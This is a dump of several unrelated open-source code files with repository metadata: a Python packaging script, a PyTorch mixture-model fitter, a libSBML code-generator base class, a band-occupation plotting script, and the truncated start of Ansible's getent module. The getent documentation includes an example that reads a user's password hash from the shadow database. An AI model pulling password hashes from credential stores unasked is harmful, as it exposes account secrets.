|
py3status/modules/kdeconnector.py
|
Python
|
bsd-3-clause
| 8,900
|
[
"Galaxy"
] |
202e286e9a69fad2f0b9b0ad646df17668e503e1bcd10be1e097de28c2596ba5
|
from setuptools import setup
import io
# read the contents of your README file
from os import path
this_directory = path.abspath(path.dirname(__file__))
with io.open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='goodvibes',
packages=['goodvibes'],
version='3.1.0',
description='A python program to compute corrections to thermochemical data from frequency calculations',
long_description=long_description,
long_description_content_type='text/markdown',
author='Paton Research Group',
author_email='robert.paton@colostate.edu',
url='https://github.com/bobbypaton/goodvibes',
download_url='https://github.com/bobbypaton/GoodVibes/archive/v3.0.1.zip',
keywords=['compchem', 'thermochemistry', 'gaussian', 'vibrational-entropies', 'temperature'],
classifiers=[],
install_requires=["numpy", ],
python_requires='>=2.6',
include_package_data=True,
entry_points={
'console_scripts': [
'goodvibes = goodvibes.GoodVibes:main',
],
}
)
|
bobbypaton/GoodVibes
|
setup.py
|
Python
|
mit
| 1,039
|
[
"Gaussian"
] |
bf29cff2efc2e7abd1eabf3c343006733dc9611eb4b49ed883b5b7e17cae15be
|
import numpy as np
import torch
from torch.autograd import Variable
from stats.tensor import tensor
def fit(pdfs, parameters, observations, iter, lr):
"""Estimates the parameters of a mixture model via maximum likelihood maximization.
Uses gradient descent for optimization.
Parameters
----------
pdfs : List of callable pdfs
Callable probability density functions (likelihood function)
expecting an array of observations as the only argument.
parameters : List of list
List of list of parameters that are subject to optimization.
e.g. for a bimodal gaussian mixture: [[mu_1, sigma_1], [mu_2, sigma_2]]
observations : ndarray
Observations from an unknown pdf which parameters are subject to be estimated
iter : float
Maximum number of iterations
lr : float
Gradient descent learning rate
Returns
-------
"""
# number of models/classes in mixture
K = len(parameters)
# initialize mixing coefficients with random values
mixcoeffs = np.random.rand(K)
mixcoeffs /= np.sum(mixcoeffs)
# make the coefficients visible to the update step
for k in range(K):
mixcoeff = Variable(tensor(mixcoeffs[k]), requires_grad=True)
parameters[k].append(mixcoeff)
for i in range(iter):
likelihood = 0
for k in range(K):
# multiply the likelihood with the mixing coefficients
# mixing coefficient: p(z_k = 1)
p_z = parameters[k][-1].expand(observations.size())
likelihood += pdfs[k](observations) * p_z
expectation = torch.mean(torch.log(likelihood))
# add constraint sum(mixcoeffs) = 1 via lagrange multiplier
for k in range(K):
expectation -= 1.0 * parameters[k][-1]
expectation += 1.0 # c = 1
if np.isnan(expectation.data[0]):
raise RuntimeError('Singular state. Try different initial parameters')
# Determine gradients
expectation.backward()
# Update parameters with gradient descent
for k in range(K):
for param in parameters[k]:
param.data.add_(lr * param.grad.data)
param.grad.data.zero_()
return expectation.data[0]
if __name__ == '__main__':
from stats.distributions import Normal
"""
Estimate mean and std of a gaussian mixture model via MixtureModel-MLE on Kx10000 observations
"""
np.random.seed(0)
# number of gaussian models in mixture
K = 2
pdfs = []
params = []
true_params = []
xs = []
for k in range(K):
# Sample observations from a bimodal normal distribution function with different parameter
true_mean = np.random.uniform(-10, 10)
true_std = np.random.uniform(0.5, 3.0)
xs.append(true_mean + np.random.randn(np.random.randint(500, 2000)) * true_std)
# Define likelihood function of model
mean_estimate = Variable(tensor(true_mean+5.*np.random.randn()), requires_grad=True)
std_estimate = Variable(tensor(1.0), requires_grad=True)
pdfs.append(Normal(mean_estimate, std_estimate))
params.append([mean_estimate, std_estimate])
true_params.append([true_mean, true_std])
x = np.concatenate(xs, axis=0)
observations = Variable(tensor(x))
log_likelihood = fit(pdfs, params, observations, iter=500, lr=0.1)
print('Log likelihood: %7.5f' % log_likelihood)
for k in range(K):
print('k=%d mean=% 7.5f std=% 7.5f coeff=% 7.5f' % (k, params[k][0].data[0], params[k][1].data[0], params[k][2].data[0]))
"""
Plot true and estimated distributions
"""
import matplotlib.pyplot as plt
n, _, _ = plt.hist(x, 100, normed=True)
# plot distributions
np_pdf = lambda x, mean, std: 1./np.sqrt(2.0*np.pi*std*std) * np.exp(- ((x-mean)**2) / (2.0 * std*std))
xx = np.linspace(np.min(x), np.max(x), 1000)
for k in range(K):
true_y = np_pdf(xx, true_params[k][0], true_params[k][1])
estimated_y = np_pdf(xx, params[k][0].data[0], params[k][1].data[0])
plt.plot(xx, true_y, '-.', label='Target pdf k=%d'%(k+1))
plt.plot(xx, estimated_y, '-', label='Estimated pdf %d' % (k+1))
plt.legend()
plt.show()
|
mlosch/pytorch-stats
|
stats/estimation/mm.py
|
Python
|
mit
| 4,418
|
[
"Gaussian"
] |
55dfb134ceed8504e41fff2bc120a02d8196db71ac7642fbdc0447660ff9e2f0
|
#!/usr/bin/env python
#
# @file BaseFile.py
# @brief base class for all files to be generated
# @author Frank Bergmann
# @author Sarah Keating
#
# <!--------------------------------------------------------------------------
#
# Copyright (c) 2013-2015 by the California Institute of Technology
# (California, USA), the European Bioinformatics Institute (EMBL-EBI, UK)
# and the University of Heidelberg (Germany), with support from the National
# Institutes of Health (USA) under grant R01GM070923. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Neither the name of the California Institute of Technology (Caltech), nor
# of the European Bioinformatics Institute (EMBL-EBI), nor of the University
# of Heidelberg, nor the names of any contributors, may be used to endorse
# or promote products derived from this software without specific prior
# written permission.
# ------------------------------------------------------------------------ -->
from util import global_variables, strFunctions
class BaseFile:
"""Common base class for all files"""
def __init__(self, name, extension):
self.name = name
self.extension = extension #For C++ example 'h'
# derived members for file
self.filename = name + '.' + extension
if name != '':
self.file_out = open(self.filename, 'w')
# derived members for comments
self.comment_start = '/**'
self.comment = ' *'
self.comment_end = '*/'
# derived members for description
if not hasattr(self, 'brief_description'):
self.brief_description = "Base file"
elif len(self.brief_description) == 0:
self.brief_description = 'Base file'
# derived members for spacing
self.line_length = 79
self.num_tabs = 0
# populate useful variables
if self.extension == 'h':
self.is_header = True
else:
self.is_header = False
# members that might get overridden if creating another library
self.language = global_variables.language
self.library_name = global_variables.library_name
self.cap_language = self.language.upper()
self.open_br = '{'
self.close_br = '}'
# members used here that will only cone from some
# instantiations of this base class
# but it needs to know that it can resolve them
self.class_name = ''
self.package = ''
self.class_object = dict()
########################################################################
# FUNCTIONS FOR WRITING LINES/COMMENTS
# based on the number of tabs and the length of line specified
# function to create lines of size specified
def create_lines(self, line, tabsize, is_comment=False):
max_length = self.line_length - tabsize
if max_length <= 0:
# we must have a line where the tabsize is so long
# multi did this with ListOfSpeciesTypeComponentMapsInProduct
max_length = self.line_length - 4
if is_comment:
max_length -= 3
lines = []
if len(line) == 0:
return lines
words = line.split()
num_words = len(words)
if num_words == 0:
lines.append(line)
elif num_words == 1:
lines.append(line)
else:
self.parse_lines(lines, words, max_length)
return lines
@staticmethod
def parse_lines(lines, words, max_length):
num_words = len(words)
in_quotes = False
quotes_closed = True
reopen_quotes = False
i = 1
temp = words[0]
if temp.startswith('\"'):
in_quotes = True
newline = words[0]
while i < num_words:
if len(newline) < max_length:
if not in_quotes:
if words[i].startswith('\"'):
in_quotes = True
quotes_closed = False
# check we dont also end
if words[i].endswith('\"'):
in_quotes = False
quotes_closed = True
else:
if words[i].endswith('\"'):
in_quotes = False
if len(temp) > 0:
temp = temp + ' ' + words[i]
else:
if reopen_quotes:
temp = '\"' + words[i]
reopen_quotes = False
else:
temp = words[i]
i += 1
if len(temp) <= max_length:
if temp.endswith('\"'):
quotes_closed = True
newline = temp
else:
if len(newline) == 0:
if in_quotes or not quotes_closed:
temp += ' \"'
quotes_closed = True
if in_quotes and not quotes_closed:
reopen_quotes = True
lines.append(temp)
temp = ''
else:
rollback = True
if in_quotes:
if words[i-1] == '",':
# special case for validation rule messages
rollback = False
newline = temp
elif words[i-1].startswith('\"'):
# do not add the quotes as we are throwing
# the word away
in_quotes = False
quotes_closed = True
else:
newline += ' \"'
quotes_closed = True
reopen_quotes = True
elif not quotes_closed:
newline += ' \"'
quotes_closed = True
reopen_quotes = True
lines.append(newline)
newline = ''
temp = ''
if rollback:
i -= 1
else:
if in_quotes or not quotes_closed:
newline += ' \"'
quotes_closed = True
reopen_quotes = True
lines.append(newline)
newline = ''
temp = ''
if len(newline) > 0:
lines.append(newline)
# write line without worrying about size
def write_line_verbatim(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}\n'.format(tabs, line))
def write_jsbml_line_verbatim(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1};\n'.format(tabs, line))
# write line without worrying about size
def copy_line_verbatim(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}'.format(tabs, line))
# functions for writing lines indenting each new line
def write_line(self, line, space=0):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
for i in range(0, space):
tabs += ' '
lines = self.create_lines(line, len(tabs))
for i in range(0, len(lines)):
self.file_out.write('{0}{1}\n'.format(tabs, lines[i]))
tabs += ' '
# functions for writing lines without indenting each new line
def write_line_no_indent(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
lines = self.create_lines(line, len(tabs))
for i in range(0, len(lines)):
self.file_out.write('{0}{1}\n'.format(tabs, lines[i]))
# function to write a line preserving with indenting
def write_spaced_line(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}\n'.format(tabs, line))
# function for blankLines
def skip_line(self, num=1):
for i in range(0, num):
self.file_out.write('\n')
# functions for writing comments
def write_comment_line(self, line):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
lines = self.create_lines(line, len(tabs), True)
for i in range(0, len(lines)):
self.file_out.write('{0}{1} {2}\n'
.format(tabs, self.comment, lines[i]))
def write_blank_comment_line(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}\n'.format(tabs, self.comment))
def open_comment(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}\n'.format(tabs, self.comment_start))
def close_comment(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0} {1}\n'.format(tabs, self.comment_end))
def write_doxygen_start(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('\n{0}{1} @cond doxygen{2}Internal {3}\n\n'
.format(tabs, self.comment_start,
self.library_name,
self.comment_end))
def write_doxygen_end(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('\n{0}{1} @endcond {2}\n\n'
.format(tabs, self.comment_start,
self.comment_end))
# function for the library extern declaration
def write_extern_decl(self):
tabs = ''
for i in range(0, int(self.num_tabs)):
tabs += ' '
self.file_out.write('{0}{1}_EXTERN\n'
.format(tabs, self.library_name.upper()))
########################################################################
# Function to copy from another file verbatim
def copy_additional_file(self, filename):
in_file = open(filename, 'r')
for line in in_file:
self.file_out.write('{0}'.format(line))
in_file.close()
########################################################################
# Functions to alter the number of tabs being used in writing lines
def up_indent(self, num=1):
self.num_tabs += num
def down_indent(self, num=1):
self.num_tabs -= num
# just checking
if self.num_tabs < 0:
self.num_tabs = 0
########################################################################
# File access functions
def close_file(self):
self.file_out.close()
########################################################################
# Default write file with standard header and licence
def write_file(self):
self.add_file_header()
def write_licence(self):
self.write_blank_comment_line()
self.write_comment_line('<!-----------------------------------------'
'---------------------------------')
# copyright can be any of teh following:
# libsbml copyright
# libsbml copyright plus custom copyright
# custom copyright
if global_variables.library_name == 'Libsbml':
# we are writing code for libsbml include the copyright
self.write_libsbml_copyright()
if global_variables.custom_copyright \
and len(global_variables.custom_copyright) > 0:
# we have a custom copyright as well
# add it
self.write_blank_comment_line()
self.write_custom_copyright()
else:
# we are writing code for something else
if not global_variables.custom_copyright \
or len(global_variables.custom_copyright) == 0:
# no copyright given so write the libsbml one
self.write_libsbml_copyright()
else:
self.write_custom_copyright()
self.write_gpl_licence()
self.write_comment_line('--------------------------------------------'
'---------------------------- -->')
def write_gpl_licence(self):
self.write_blank_comment_line()
self.write_comment_line('This library is free software; you can '
'redistribute it and/or modify it under the '
'terms of the GNU Lesser General Public '
'License as published by the Free Software '
'Foundation. A copy of the license agreement'
' is provided in the file named "LICENSE.txt"'
' included with this software distribution '
'and also available online as http://sbml.org'
'/software/libsbml/license.html')
def write_custom_copyright(self):
filename = global_variables.custom_copyright
in_file = open(filename, 'r')
for line in in_file:
self.write_comment_line('{0}'.format(line))
in_file.close()
def write_libsbml_copyright(self):
self.write_comment_line('This file is part of libSBML. Please visit '
'http://sbml.org for more information about '
'SBML, and the latest version of libSBML.')
self.write_blank_comment_line()
self.write_comment_line('Copyright (C) 2013-2016 jointly by the '
'following organizations:')
self.write_comment_line(' 1. California Institute of Technology, '
'Pasadena, CA, USA')
self.write_comment_line(' 2. EMBL European Bioinformatics '
'Institute (EMBL-EBI), Hinxton, UK')
self.write_comment_line(' 3. University of Heidelberg, Heidelberg, '
'Germany')
self.write_blank_comment_line()
self.write_comment_line('Copyright (C) 2009-2013 jointly by the '
'following organizations:')
self.write_comment_line(' 1. California Institute of Technology, '
'Pasadena, CA, USA')
self.write_comment_line(' 2. EMBL European Bioinformatics '
'Institute (EMBL-EBI), Hinxton, UK')
self.write_blank_comment_line()
self.write_comment_line('Copyright (C) 2006-2008 by the California '
'Institute of Technology,')
self.write_comment_line(' Pasadena, CA, USA ')
self.write_blank_comment_line()
self.write_comment_line('Copyright (C) 2002-2005 jointly by the '
'following organizations:')
self.write_comment_line(' 1. California Institute of Technology, '
'Pasadena, CA, USA')
self.write_comment_line(' 2. Japan Science and Technology Agency, '
'Japan')
def add_file_header(self):
self.open_comment()
self.write_comment_line('@file {0}'.format(self.filename))
self.write_comment_line('@brief {0}'.format(self.brief_description))
if global_variables.is_package:
self.write_comment_line('@author SBMLTeam')
else:
self.write_comment_line('@author DEVISER')
if self.extension != 'xml' and self.extension != 'rng':
self.write_licence()
if self.is_header and not self.is_excluded(self.name):
if self.name.endswith('Extension'):
self.write_class_comments(True, False, False)
elif self.name.endswith('Plugin'):
self.write_class_comments(False, True, False)
elif self.name.endswith('Validator'):
self.write_class_comments(False, False, True)
else:
self.write_class_comments(False, False, False)
self.close_comment()
def write_class_comments(self, extension, plugin, validator):
fullname = global_variables.package_full_name
up_package = strFunctions.upper_first(self.package)
validator_class_comment = 'The {0} class extends the ' \
'Validator class from core libSBML to ' \
'apply validation to the constructs ' \
'introduced by the SBML Level 3 ' \
'{1} package. This class then acts as a ' \
'base class for any validators that ' \
'apply rules to the “{2}” ' \
'package specification constructs or to ' \
'entire models that use the “{2}' \
'” package, and may therefore be ' \
'subject to other global restrictions ' \
'introduced.'.format(self.name,
fullname,
self.package.lower())
self.write_blank_comment_line()
self.write_comment_line('@class {0}'.format(self.class_name))
if extension:
self.write_comment_line('@sbmlbrief{0}{1}{2} Base extension class'
'.'.format(self.open_br,
self.package.lower(),
self.close_br))
self.write_blank_comment_line()
self.write_comment_line('@class {0}PkgNamespaces'
''.format(up_package))
self.write_comment_line('@sbmlbrief{0}{1}{2} SBMLNamespaces '
'extension.'
''.format(self.open_br,
self.package.lower(),
self.close_br))
elif plugin:
self.write_comment_line('@sbmlbrief{0}{1}{2} Extension of '
'{3}.'.format(self.open_br,
self.package.lower(),
self.close_br,
self.class_object['sbase']))
elif validator:
self.write_comment_line('@sbmlbrief{0}{1}{2} Entry point for '
'“{1}&rdquo package validation'
'.'.format(self.open_br,
self.package.lower(),
self.close_br))
self.write_blank_comment_line()
self.write_comment_line('@htmlinclude not-sbml-warning.html')
self.write_blank_comment_line()
self.write_comment_line('@copydetails doc_common_intro_'
'package_validators')
self.write_blank_comment_line()
self.write_comment_line('{0}'.format(validator_class_comment))
self.write_blank_comment_line()
self.write_comment_line('@copydetails doc_section_package_'
'validators_general_info')
else:
self.write_comment_line('@sbmlbrief{0}{1}{2} TODO:'
'{3}'.format(self.open_br,
self.package.lower(),
self.close_br,
self.brief_description))
@staticmethod
def is_excluded(filename):
excluded = False
excluded_files = ['Types', 'fwd', 'Error', 'ErrorTable',
'ConsistencyValidator', 'package', 'register']
i = 0
while not excluded and i < len(excluded_files):
if filename.endswith(excluded_files[i]):
excluded = True
i += 1
if not excluded:
if filename == global_variables.library_name.lower():
excluded = True
return excluded
|
hovo1990/deviser
|
generator/base_files/BaseFile.py
|
Python
|
lgpl-2.1
| 22,143
|
[
"VisIt"
] |
224809df4bcbbf7fc562031b9684767f8376caaf215274d67d0a76145ed358cb
|
# This script reads the carrier database
# and display it along a path in histogram form
# along with a representation of the carriers in energy space
from __future__ import print_function
from __future__ import division
from builtins import range
from past.utils import old_div
from yambopy import *
import matplotlib.gridspec as gridspec
from matplotlib.colors import Normalize
from scipy.optimize import curve_fit
import os
############
# SETTINGS #
############
folder = 'rt-30x30'
calc = 'QSSIN-100.0fs-2.08eV-300K-DG' # Where RT carrier output is
path = [[0.0,0.0,0.0],[0.5,0.0,0.0],[0.33333,0.33333,0.0],[0.0,0.0,0.0]]
nbv = 2 ; nbc = 2 # nb of valence and conduction bands
occ_scaling = 1 # max occupation will be 1eV high
degen_thres = 0.1 # Energy below which two bands are considered degenerate
########
# INIT #
########
# For saving pictures
os.system('mkdir -p occupations/%s/%s'%(folder,calc))
# Instance containing bandstructure (as used in RT sim) and occupations
yrt = YamboRTDB(folder=folder,calc=calc)
yrt.get_path(path) # Generates kindex
### aliases
times = [i * 1e15 for i in yrt.times] # carriers output times, in fs
nbands = yrt.nbands # number of bands in the RT simulation
if nbv+nbc != nbands:
raise NameError('Incompatible number of bands, set nbv and nbc in script.')
## 'path-plot' variables
kindex = yrt.bands_indexes # kpoint indexes (in order) to draw path
eigenvalues = yrt.eigenvalues[kindex,:] # eigenvalues of the bands included in the RT simulation
#
max_occ = np.amax(yrt.occupations[:,kindex,:]) # used to size the distribution plots
occupations = yrt.occupations[:,kindex,:]/max_occ*occ_scaling # format time,kindex,band index (from 0 to nbands, only on path)
norm=Normalize(vmin=0, vmax=occ_scaling, clip=False) # normalizatin class for the color gradiant on bands
#
xocc = np.arange(len(kindex)) # array of ints to plot occupation on path properly
##
## 'fit' variables and function
# FD distrib for fit
def fermi_dirac(E,a,T): # declare E first for fit
return old_div(1,(1+np.exp(old_div((E-a),T))))
#
KtoeV = 8.61733e-5
#
# xeng is an array of values to plot the fit properly
xeng = np.linspace(np.amin(eigenvalues[:,list(range(nbv))]), np.amax(eigenvalues[:,list(range(nbv,nbands))]),1000)
##
##############
# EXT. FIELD #
##############
# The external field is read from the o- file
ext = np.loadtxt('%s/%s/pulse/o-pulse.external_field'%(folder,calc))
field = old_div(ext[:,2],max(abs(ext[:,2]))) # polarization : x=1,y=2,z=3
##################
# ENERGY DISTRIB #
##################
# Sort the (n,k) pairs between positive and negative energies
# (If the same energy appears twice, it must not be summed over)
list_e=[] ; list_h=[]
for k in range(yrt.nkpoints):
for n in range(yrt.nbands):
e = yrt.eigenvalues[k,n]
if e<=0.0:
list_h.append((k,n))
else:
list_e.append((k,n))
# Build the occupation tables occ_x[t,(nk)_index,(e|occ)]
occ_e = np.zeros((len(times),len(list_e),2))
for t in range(len(times)):
for i,(k,n) in enumerate(list_e):
occ_e[t,i,0]=yrt.eigenvalues[k,n]
occ_e[t,i,1]=yrt.occupations[t,k,n]
occ_h = np.zeros((len(times),len(list_h),2))
for t in range(len(times)):
for i,(k,n) in enumerate(list_h):
occ_h[t,i,0]=yrt.eigenvalues[k,n]
occ_h[t,i,1]=yrt.occupations[t,k,n]
# *(-1) on holes to fit the same way as electrons
occ_h *= -1
#################
# BAR PLOT DATA #
#################
# occupations in CBs/VBs are summed for easier reading if there are more than one
# Recall that 'occupations' was normalized then multiplied by occ_scaling (for esthetics)
if nbv > 1:
# one entry per band +1 for the total occ
occ_v = np.zeros((len(times),len(kindex),nbv+1))
occ_c = np.zeros((len(times),len(kindex),nbc+1))
for n in range(nbv):
occ_v[:,:,n] = -occupations[:,:,n] # minus sign to get positive occupations
np.add(occ_v[:,:,n],occ_v[:,:,nbv],occ_v[:,:,nbv]) # each time we add the occ of the current band to the total
for n in range(nbc):
occ_c[:,:,n] = occupations[:,:,n+nbv] # +nbv to read CBs
np.add(occ_c[:,:,n],occ_c[:,:,nbc],occ_c[:,:,nbc]) # each time we add the occ of the current band to the total
####################
# TIME LOOP & PLOT #
####################
# Gridspec allows to place subplots on a grid
# spacing for exemple can be customised
gs = gridspec.GridSpec(9, 8)
# y range for band structure & energy plots
ymin_v= np.amin(eigenvalues[:,:nbv])-0.1
ymin_c= np.amin(eigenvalues[:,nbv:])-0.1
ymax_v= max(np.amax(eigenvalues[:,:nbv])+np.amax(occ_c[:,:,nbv:])+0.1, np.amax(eigenvalues[:,:nbv])+0.1)
ymax_c= max(np.amin(eigenvalues[:,nbv:])+np.amax(occ_c[:,:,nbv:])+0.1, np.amax(eigenvalues[:,nbv:])+0.1)
###
for t in range(len(times)):
i=t
print(times[i])
name = 'occupations/'+folder+'/'+calc+'/%d.png' % (times[t])
fig = plt.figure()
fig.suptitle('Occupation of the bands and fit to the Fermi-Dirac distribution',fontsize=14,ha='center')
####### bandstructure w/ occupation plot
ax1c = plt.subplot(gs[0:4,0:-2])
ax1v = plt.subplot(gs[4:8,0:-2])
# remove x ticks
ax1c.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
ax1v.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
# set x range
ax1c.set_xlim((0,xocc[-1]))
ax1v.set_xlim((0,xocc[-1]))
# y range is defined with ax3 and ax4 (they share y axis with ax1)
# Plot band structure
ax1v.plot(eigenvalues[:,:nbv],'k-',lw=2,zorder=0)
ax1c.plot(eigenvalues[:,nbv:],'k-',lw=2,zorder=0)
## Colored spots when degen is beyond degen_thres
# For that, we compare eigenvalues of (k,n) with (k,n+1)
# note : if more than 2 VB/CB, this scatter scheme might not be optimal (e.g. with 1 + 2 degen bands)
# VB
for n in range(nbv-1): # we compare n and n+1 <= nbv
# bool array with condition on degeneracy
diff_eigen = abs(eigenvalues[:,n]-eigenvalues[:,n+1])
# plot for points that respect the condition
ax1v.scatter(xocc[diff_eigen>degen_thres],eigenvalues[diff_eigen>degen_thres,n] ,s=30, c=occ_v[t,diff_eigen>degen_thres,n] ,cmap='plasma',alpha=1,edgecolors='none',norm=norm)
ax1v.scatter(xocc[diff_eigen>degen_thres],eigenvalues[diff_eigen>degen_thres,n+1],s=30, c=occ_v[t,diff_eigen>degen_thres,n+1],cmap='plasma',alpha=1,edgecolors='none',norm=norm)
# CB
for n in range(nbc-1):
diff_eigen = abs(eigenvalues[:,nbv+n]-eigenvalues[:,nbv+n+1])
ax1c.scatter(xocc[diff_eigen>degen_thres],eigenvalues[diff_eigen>degen_thres,nbv+n] ,s=30, c=occ_c[t,diff_eigen>degen_thres,n] ,cmap='plasma',alpha=1,edgecolors='none',norm=norm)
ax1c.scatter(xocc[diff_eigen>degen_thres],eigenvalues[diff_eigen>degen_thres,nbv+n+1],s=30, c=occ_c[t,diff_eigen>degen_thres,n+1],cmap='plasma',alpha=1,edgecolors='none',norm=norm)
## occupation in the form of histograms
# small y-shift for better reading
ax1v.bar(xocc,occ_v[t,:,nbv],width=0.4,bottom=eigenvalues[:,nbv-1]+0.1,color='blue',edgecolor='none')
ax1c.bar(xocc,occ_c[t,:,nbc],width=0.4,bottom=eigenvalues[:,nbands-1]+0.1,color='red',edgecolor='none')
# text and labels
fig.text(0.05,0.6,'Energy (eV)',size=16,rotation='vertical')
fig.text(0.50,0.91, '%d fs'%times[t],size=16)
######## field plot
ax2 = plt.subplot(gs[-1,:])
# remove ticks and labels
ax2.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
ax2.tick_params(axis='y',which='both',left='off',right='off',labelleft='off')
# text
ax2.set_ylabel('Field')
# frame size
ax2.set_xlim((0,times[-1]))
ax2.set_ylim((-1.3,1.3))
ax2.plot(field[:int(times[t])])
## Plot of the occupation as a function of energy (rotated to match the band structure)
ax3 = plt.subplot(gs[0:4,-2:],sharey=ax1c)
ax4 = plt.subplot(gs[4:8,-2:],sharey=ax1v)
# plot the data
try: # does not break if fit is not found
fit,cov = curve_fit(fermi_dirac,occ_e[i,:,0],occ_e[i,:,1])
except RuntimeError:
fit=np.array([0,0])
ax3.scatter(occ_e[i,:,1],occ_e[i,:,0],s=10,color='black')
ax3.plot(fermi_dirac(xeng,fit[0],fit[1]),xeng,'r-')
ax3.text(0.5,0.9,'Electrons\nT = %d K'%(old_div(fit[1],KtoeV)),transform=ax3.transAxes,ha='center',va='center')
try:
fit,cov = curve_fit(fermi_dirac,occ_h[i,:,0],occ_h[i,:,1])
except RuntimeError:
fit=np.array([0,0])
ax4.scatter(occ_h[i,:,1],-occ_h[i,:,0],color='black')
ax4.plot(fermi_dirac(xeng,fit[0],fit[1]),-xeng,'b-')
ax4.text(0.5,0.1,'Holes\nT = %d K'%(old_div(fit[1],KtoeV)),transform=ax4.transAxes,ha='center',va='center')
# set x and y range
ax4.set_xlim(-0.1*max_occ,1.1*max_occ)
ax3.set_xlim(-0.1*max_occ,1.1*max_occ)
ax3.set_ylim(( ymin_c,ymax_c ))
ax4.set_ylim(( ymin_v,ymax_v ))
# hide some ticks/labels
ax3.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
ax3.tick_params(axis='y',labelleft='off',labelright='off')
ax4.tick_params(axis='x',which='both',bottom='off',top='off',labelbottom='off')
ax4.tick_params(axis='y',labelleft='off',labelright='off')
plt.savefig( name ,transparent=False,dpi=300)
print(name)
#plt.show()
plt.close(fig)
|
alexmoratalla/yambopy
|
scripts/realtime/plot_occ.py
|
Python
|
bsd-3-clause
| 9,348
|
[
"DIRAC"
] |
f6176e8112519f5301e42159e72c5a99e385875dde145c8ffd91cda78130615a
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2014, Brian Coca <brian.coca+dev@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: getent
short_description: A wrapper to the unix getent utility
description:
- Runs getent against one of it's various databases and returns information into
the host's facts, in a getent_<database> prefixed variable.
version_added: "1.8"
options:
database:
description:
- The name of a getent database supported by the target system (passwd, group,
hosts, etc).
type: str
required: True
key:
description:
- Key from which to return values from the specified database, otherwise the
full contents are returned.
type: str
default: ''
service:
description:
- Override all databases with the specified service
- The underlying system must support the service flag which is not always available.
type: str
version_added: "2.9"
split:
description:
- "Character used to split the database values into lists/arrays such as ':' or '\t', otherwise it will try to pick one depending on the database."
type: str
fail_key:
description:
- If a supplied key is missing this will make the task fail if C(yes).
type: bool
default: 'yes'
extends_documentation_fragment:
- action_common_attributes
- action_common_attributes.facts
attributes:
check_mode:
support: full
diff_mode:
support: none
facts:
support: full
platform:
platforms: posix
notes:
- Not all databases support enumeration, check system documentation for details.
author:
- Brian Coca (@bcoca)
'''
EXAMPLES = '''
- name: Get root user info
getent:
database: passwd
key: root
- debug:
var: ansible_facts.getent_passwd
- name: Get all groups
getent:
database: group
split: ':'
- debug:
var: ansible_facts.getent_group
- name: Get all hosts, split by tab
getent:
database: hosts
- debug:
var: ansible_facts.getent_hosts
- name: Get http service info, no error if missing
getent:
database: services
key: http
fail_key: False
- debug:
var: ansible_facts.getent_services
- name: Get user password hash (requires sudo/root)
getent:
database: shadow
key: www-data
split: ':'
- debug:
var: ansible_facts.getent_shadow
'''
RETURN = '''
ansible_facts:
description: Facts to add to ansible_facts.
returned: always
type: dict
contains:
getent_<database>:
description:
- A list of results or a single result as a list of the fields the db provides
- The list elements depend on the database queried, see getent man page for the structure
- Starting at 2.11 it now returns multiple duplicate entries, previouslly it only returned the last one
returned: always
type: list
'''
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
def main():
module = AnsibleModule(
argument_spec=dict(
database=dict(type='str', required=True),
key=dict(type='str', no_log=False),
service=dict(type='str'),
split=dict(type='str'),
fail_key=dict(type='bool', default=True),
),
supports_check_mode=True,
)
colon = ['passwd', 'shadow', 'group', 'gshadow']
database = module.params['database']
key = module.params.get('key')
split = module.params.get('split')
service = module.params.get('service')
fail_key = module.params.get('fail_key')
getent_bin = module.get_bin_path('getent', True)
if key is not None:
cmd = [getent_bin, database, key]
else:
cmd = [getent_bin, database]
if service is not None:
cmd.extend(['-s', service])
if split is None and database in colon:
split = ':'
try:
rc, out, err = module.run_command(cmd)
except Exception as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
msg = "Unexpected failure!"
dbtree = 'getent_%s' % database
results = {dbtree: {}}
if rc == 0:
seen = {}
for line in out.splitlines():
record = line.split(split)
if record[0] in seen:
